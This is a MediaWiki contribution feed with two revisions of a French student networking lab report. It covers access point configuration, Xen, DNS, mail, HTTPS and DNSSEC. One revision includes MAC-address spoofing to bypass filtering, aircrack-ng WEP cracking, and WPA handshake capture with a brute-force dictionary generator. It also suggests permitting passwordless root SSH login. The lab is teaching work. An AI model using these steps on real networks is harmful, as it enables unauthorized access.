<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Machkra</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Machkra"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Machkra"/>
		<updated>2026-04-24T12:15:24Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=24065</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=24065"/>
				<updated>2015-12-06T22:12:09Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connexion série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l’accès au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d’accès afin qu'il autorise l’accès a certaine adresse mac et bloque le reste :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00:15.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Les adresse mac autorisé sont : 00;15:af:e6:ed:b3 et 00:15:af:e6:ed:c4 et 00:15:af:e7:2d:fb&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et se lance une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Intrusion par Adresse Mac &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on cassera la sécurité Wifi, pour cela il faut juste changer l’adresse Mac de notre PC :&lt;br /&gt;
Pour cela, on utilise les lignes de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:15:af:e7:2d:fb  (PC d' Eric)&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Crackage de la cle wep &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on s'interessera au crackage de la cle wep, pour cela on utilise le packetage aircrack.&lt;br /&gt;
Dans un premier temps :&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
airmondump-ng mon0&lt;br /&gt;
airmondump-ng mon0 --channel 5 --write capteur --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
aircrack-ng capture-01.cap&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;Crackage de la cle wpa&amp;lt;/h4&amp;gt;&lt;br /&gt;
la particularité de ce crackage est le fait de trouver le handshak :&lt;br /&gt;
Pour cela on commence par la ligne de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng -w out --encrypt wpa -c 11 --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois le handshak est obtenue, on crée un dictionnaire pour le bruteforce sur notre clé wpa, pour cela on cree un petit programme en C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
int cpt = 0;&lt;br /&gt;
for(cpt=0;cpt&amp;lt;99999999;cpt++){&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,cpt);&lt;br /&gt;
}&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On execute le programme en redirigeant sa sortie vers le fichier dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./bruteforce &amp;gt; dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
une fois le dictionnaire est créer, on utilise aircrack-ng ainsi que notre fichier capture(avec le handshak)&lt;br /&gt;
Le bruteforce prend une heure pour tester toutes les possibilités avant de trouver la clé wpa&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [00:58:47] 12399908 keys tested (3597.80 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399905 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 10 F5 F9 6D F5 5D 9A D7 66 CE 4D 59 A7 28 E8 FC &lt;br /&gt;
                       AF FD 13 C5 BF 80 CC AB 1E 72 7F 8F 07 36 3E E5 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : FD 23 BE EE 18 CA 1E 70 D5 E8 2A 44 0A B7 08 7C &lt;br /&gt;
                       CD BA E5 A4 5A 34 EE 2F B4 13 2A 20 81 A7 7A 1B &lt;br /&gt;
                       3E 5A E1 14 D6 4D B9 0B FA 71 D1 C7 FF 01 FE F9 &lt;br /&gt;
                       3A 24 2A F3 91 6F C5 AA 5A 93 6D 64 F9 BC 59 68 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : DE 44 15 8A 67 04 2C FD 62 79 93 1F 08 7B 34 D6 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, on s'occupera de la création de la machine virtuel :&lt;br /&gt;
Dans un premier temps, on se connecte en root sur la machine cordouan&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net // pour se connecter au serveur hébergeant nos machines virtuels &lt;br /&gt;
xen-create-image --hostname dragon --ip 193.48.57.180 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Après l'installation de la machine virtuel, quelques changements sont obligatoires :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// autoriser l’accès root  &lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
&lt;br /&gt;
// dessinstaller les packets network-manager systemd&lt;br /&gt;
apt-get purge network-manager systemd&lt;br /&gt;
&lt;br /&gt;
// pour passer via le lien ssh au lieu du lien série&lt;br /&gt;
init tab ==&amp;gt; sur la ligne 45 on change le tty1 par hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la configuration de notre machine virtuel, il faudra retenir que : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvirir la machine pour la première fois ou après l'avoir éteinte  : xl create /etc/xen/[nom de la machine].cfg&lt;br /&gt;
Pour l'ouverture d'une machine virtuel on utilise la commande: xl console [nom de la machine]&lt;br /&gt;
Pour eteindre la machine on utilise la comande : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Configuration du DNS &amp;lt;/h3&amp;gt;&lt;br /&gt;
Dans cette partie, on n'utilisera plus le serveur DNS de gandi mais le notre installé sur nos machines virtuelles.&lt;br /&gt;
Pour cela il est nécessaire de modifier ces fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
named.conf.local :&lt;br /&gt;
zone &amp;quot;loveandpeace.lol&amp;quot; {&lt;br /&gt;
        type master; // notre DNS est maitre et celui de gandi comme esclave&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dragon&amp;quot;;  //dans ce fichier la, on met toutes notre configuration du DNS&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
db.dragon :&lt;br /&gt;
;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    3600&lt;br /&gt;
@       IN      SOA     ns admin (&lt;br /&gt;
                              3         ; Serial  // ce numero doit être incrémenté après lors de chaque modification&lt;br /&gt;
                           3600         ; Refresh &lt;br /&gt;
                            600         ; Retry&lt;br /&gt;
                          36000         ; Expire&lt;br /&gt;
                           3600 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns&lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
@       IN      MX      100 mail&lt;br /&gt;
&lt;br /&gt;
ns      IN      A       193.48.57.180 //adresse de ma machine virtuel&lt;br /&gt;
mail    IN      A       193.48.57.180&lt;br /&gt;
www     IN      CNAME   ns&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
named.conf.options :&lt;br /&gt;
options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
&amp;lt;h3&amp;gt; installer le mail server &amp;lt;/h3&amp;gt;&lt;br /&gt;
après la configuration du DNS, on passe à la configuration du mail, ce dernier nous aidera ensuite à la réception du certificat https de gandi.&lt;br /&gt;
Pour cela&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 apt-get install postfix // on installe postfix&lt;br /&gt;
 vi /etc/aliases =&amp;gt; ajout de : admin:         root // on ajoute un utilisateur qui recevra les mail adressé à admin@loveandpeace.lol&lt;br /&gt;
 apt-get install mailx // on installe mailx&lt;br /&gt;
 apt-get install bsd-mailx // on installe bsd-mailx&lt;br /&gt;
 newaliases // recompiler les alias&lt;br /&gt;
 mailx // on vérifie notre boite mail&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation du site en https&amp;lt;/h3&amp;gt;&lt;br /&gt;
Pour la sécurisation du site, il faut créer le fichier suivant : /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  &amp;lt;VirtualHost 193.48.57.180:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.loveandpeace.lol&lt;br /&gt;
        ServerAlias loveandpeace.lol&lt;br /&gt;
        DocumentRoot /var/www/www.loveandpeace.lol/  //ici, on met la racine de notre site en mode https&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        // on définit le chemin des certificats obtenus chez gandi&lt;br /&gt;
        SSLCertificateFile /root/dragon.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/dragon.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en considération ces modifications, il faut exécuter les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// on prends en compte les modifications&lt;br /&gt;
a2ensite 000-domain.tld-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
//on redemarre le serveur apache&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation du serveur par DNSSEC&amp;lt;/h3&amp;gt;mettant &lt;br /&gt;
En premier, on modifie le fichier /etc/bind/named.conf.options en mettant dnssec-enable =&amp;gt; yes&lt;br /&gt;
Ensuite, on cree le dossier /etc/bind/loveandpeace pour y stocker les clés&lt;br /&gt;
Après, on execute les commandes suivantes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom loveandpeace.lol &lt;br /&gt;
// on renomme ensuite les fichiers générés&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom loveandpeace.lol&lt;br /&gt;
// on renomme ensuite les fichiers générés&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la géneration des clès on doit les prendre en compte dans le fichier db.dragon en incrémentant le &amp;quot;Serial&amp;quot; par 1&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrement grâce à la commande suivante :&lt;br /&gt;
dnssec-signzone -o loveandpeace.lol -k loveandandpaece-ksk ../db.dragon loveandpeace-zsk&lt;br /&gt;
ensuite dans le fichier named.conf.local, on modifie  &amp;quot;/etc/bind/db.dragon&amp;quot;; par &amp;quot;/etc/bind/db.dragon.signed&amp;quot;;&lt;br /&gt;
Au final, on communique la clef publique KSK à gandi.net&lt;br /&gt;
Pour les tests  on utilise le sevise suivant : http://dnsviz.net&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=24027</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=24027"/>
				<updated>2015-12-04T22:19:16Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connexion série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l’accès au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d’accès afin qu'il autorise l’accès a certaine adresse mac et bloque le reste :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00:15.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Les adresse mac autorisé sont : 00;15:af:e6:ed:b3 et 00:15:af:e6:ed:c4 et 00:15:af:e7:2d:fb&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et se lance une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
